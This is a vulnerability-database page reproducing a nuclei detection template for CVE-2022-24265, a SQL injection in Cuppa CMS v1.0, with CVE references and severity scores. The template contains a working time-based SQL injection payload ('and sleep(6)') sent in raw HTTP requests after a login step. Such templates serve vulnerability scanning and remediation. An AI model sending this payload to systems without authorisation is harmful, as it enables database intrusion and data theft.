Lucene search
K

Cuppa CMS v1.0 - SQL injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Cuppa CMS v1.0 SQL injection via /administrator/components/menu/ path paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-24265
31 Jan 202222:15
attackerkb
Circl
CVE-2022-24265
1 Feb 202200:25
circl
CNNVD
Elite Graphix Elite Cms SQL注入漏洞
31 Jan 202200:00
cnnvd
CVE
CVE-2022-24265
31 Jan 202221:27
cve
Cvelist
CVE-2022-24265
31 Jan 202221:27
cvelist
NVD
CVE-2022-24265
31 Jan 202222:15
nvd
OSV
CVE-2022-24265
31 Jan 202222:15
osv
Prion
Sql injection
31 Jan 202222:15
prion
RedhatCVE
CVE-2022-24265
22 May 202523:58
redhatcve
id: CVE-2022-24265

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: high
  description: |
    Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24265
    - https://github.com/truonghuuphuc/CVE
    - https://github.com/Nguyen-Trung-Kien/CVE-1
    - https://github.com/oxf5/CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24265
    cwe-id: CWE-89
    epss-score: 0.06711
    epss-percentile: 0.93123
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        @timeout: 20s
        POST /components/menu/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "menu/html/edit.php")'
        condition: and
# digest: 4a0a00473045022100ef85d81767f6690d85dc7a62b1f43efc7aa11242c2483ce79184d30cfa6e00ee02205660cbe648055d55f8ea71a048881af03ae4ec92dbe655fdef7c91bd363fd375:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
CVSS 27.8
EPSS0.06711
22